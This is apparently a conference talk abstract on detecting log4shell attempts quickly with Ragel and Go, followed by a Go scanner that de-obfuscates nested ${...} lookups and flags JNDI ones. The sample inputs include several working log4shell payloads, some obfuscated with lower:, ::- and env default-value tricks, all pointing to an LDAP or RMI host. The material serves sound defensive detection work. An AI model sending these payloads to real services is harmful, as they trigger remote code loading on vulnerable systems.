Online / 5 & 6 February 2022


Detect Log4shell in No Time with Ragel and Go


I bet everyone has heard of log4shell. I also hope everyone remembers the consequent rush to detect and fix it.

I've seen people DDoS their own systems using regular expressions to detect log4shell!

That's why I sat down to write a Go parser with Ragel that runs 20 times faster than other detection tools.

Join me to learn how to do it yourself next time.

In recent months, we've seen a plethora of supply chain attacks.

You all probably remember the log4j vulnerability, impacting half of the world's software, and the consequent rush to fix it.

New ways to trigger the vulnerability were being published at every hour of the day.

Fixing a vulnerability as widespread as log4shell is almost impossible: it requires a lot of coordination and time. During that window, attackers kept compromising systems with log4shell techniques.

People started spending their weekends building detection tools to understand whether someone had attempted to compromise their systems with log4shell.

Inspecting every network packet on the fly, or petabytes of logs afterwards, by matching against the many log4shell payload variants has mostly been unfeasible, given the huge number of ways such attacks can be written and obfuscated.

I've seen people DDoS their own systems using regular expressions to detect log4shell! Hilarious, isn't it?

For this reason, I built a blazingly fast parser using Go and Ragel.

Join me in this talk to learn everything about building finite-state machines in Go with Ragel that run 20x faster than regular expressions.

This talk aims to give these two technologies, which work remarkably well together, the spotlight they deserve.
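To make the detection problem concrete, here is an added example that is not the speaker's tool and not Ragel-generated output: a hand-written, single-pass byte scanner in Go that stands in for the kind of state machine Ragel would generate. It brackets `${ ... }` lookups with a fixed set of states and a nesting counter (no backtracking, so each byte is examined once per nesting level), resolves the obfuscation forms that circulated at the time (the `${name:-x}` / `${::-x}` default-value syntax and `${lower:}` / `${upper:}`), and reports whether any lookup at any depth resolves to a `jndi:` one. The sample log lines are constructed, 203.0.113.5 is a documentation address, and the `Analyze` function and all names are this example's own assumptions; other lookup tricks (for instance `${date:}`-based or Unicode case games) are deliberately out of scope here.

```go
package main

import (
	"fmt"
	"strings"
)

// States of the byte-level scanner that brackets `${ ... }` lookups in a line.
const (
	stText   = iota // outside any lookup
	stDollar        // just saw '$'; a following '{' opens a lookup
	stLookup        // inside a lookup; depth counts nested "${"
)

// span is one top-level lookup: index of its leading '$' and of its matching '}'.
type span struct{ open, close int }

// scanLookups walks s exactly once, byte by byte, with a fixed set of states and
// a depth counter, and returns every top-level `${ ... }`. There is no backtracking,
// which is the property the talk contrasts with regular expressions.
func scanLookups(s string) []span {
	var out []span
	state, depth, open := stText, 0, 0
	for i := 0; i < len(s); i++ {
		c := s[i]
		switch state {
		case stText:
			if c == '$' {
				state = stDollar
			}
		case stDollar:
			switch c {
			case '{':
				state, depth, open = stLookup, 1, i-1
			case '$': // "$$" keeps waiting for a '{'
			default:
				state = stText
			}
		case stLookup:
			switch c {
			case '{':
				if s[i-1] == '$' {
					depth++
				}
			case '}':
				if depth--; depth == 0 {
					out = append(out, span{open, i})
					state = stText
				}
			}
		}
	}
	return out // an unterminated "${" is never appended; log4j would not expand it either
}

// detector rewrites nested lookups to the literal they would expand to and
// remembers whether any lookup, at any depth, resolved to a "jndi:" one.
type detector struct{ hit bool }

// expand replaces every lookup in s with resolve(body), innermost first.
func (d *detector) expand(s string) string {
	var b strings.Builder
	last := 0
	for _, sp := range scanLookups(s) {
		b.WriteString(s[last:sp.open])
		b.WriteString(d.resolve(s[sp.open+2 : sp.close]))
		last = sp.close + 1
	}
	b.WriteString(s[last:])
	return b.String()
}

// resolve handles the obfuscation forms seen in the wild: the default-value
// syntax ${name:-x} / ${::-x} (yields "x") and ${lower:X} / ${upper:x}.
// Any other lookup is kept verbatim so the normalized line stays readable.
func (d *detector) resolve(body string) string {
	body = d.expand(body)
	if strings.HasPrefix(strings.ToLower(body), "jndi:") {
		d.hit = true // checked before default-value stripping, so ${jndi:...:-x} still counts
	}
	if i := strings.LastIndex(body, ":-"); i >= 0 {
		return body[i+2:]
	}
	switch lb := strings.ToLower(body); {
	case strings.HasPrefix(lb, "lower:"):
		return strings.ToLower(body[len("lower:"):])
	case strings.HasPrefix(lb, "upper:"):
		return strings.ToUpper(body[len("upper:"):])
	}
	return "${" + body + "}"
}

// Analyze returns the de-obfuscated line and whether it carries a JNDI lookup.
func Analyze(line string) (normalized string, log4shell bool) {
	d := &detector{}
	normalized = d.expand(line)
	return normalized, d.hit
}

func main() {
	// Constructed sample log lines (assumed input); 203.0.113.5 is a documentation address.
	samples := []string{
		`GET / HTTP/1.1 UA: ${jndi:ldap://203.0.113.5/a}`,
		`${${lower:j}ndi:${lower:l}dap://203.0.113.5/a}`,
		`${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.5/a}`,
		`${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.5/a}`,
		`UA: Mozilla/5.0 ${java:version}`,
		`${jndi`, // truncated: log4j would not expand it
	}
	for _, s := range samples {
		norm, hit := Analyze(s)
		fmt.Printf("%-5v %s\n", hit, norm)
	}
}
```

The normalized line is worth keeping in an alert: for the third sample it comes out as the canonical `${jndi:rmi://203.0.113.5/a}`, which is what an analyst wants to see rather than the obfuscated original. A Ragel machine would let you express the same scanner declaratively and compile it to a table- or goto-driven Go function, but the shape of the logic, fixed states plus a counter and no backtracking, is the same.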

Speakers

Leonardo Di Donato
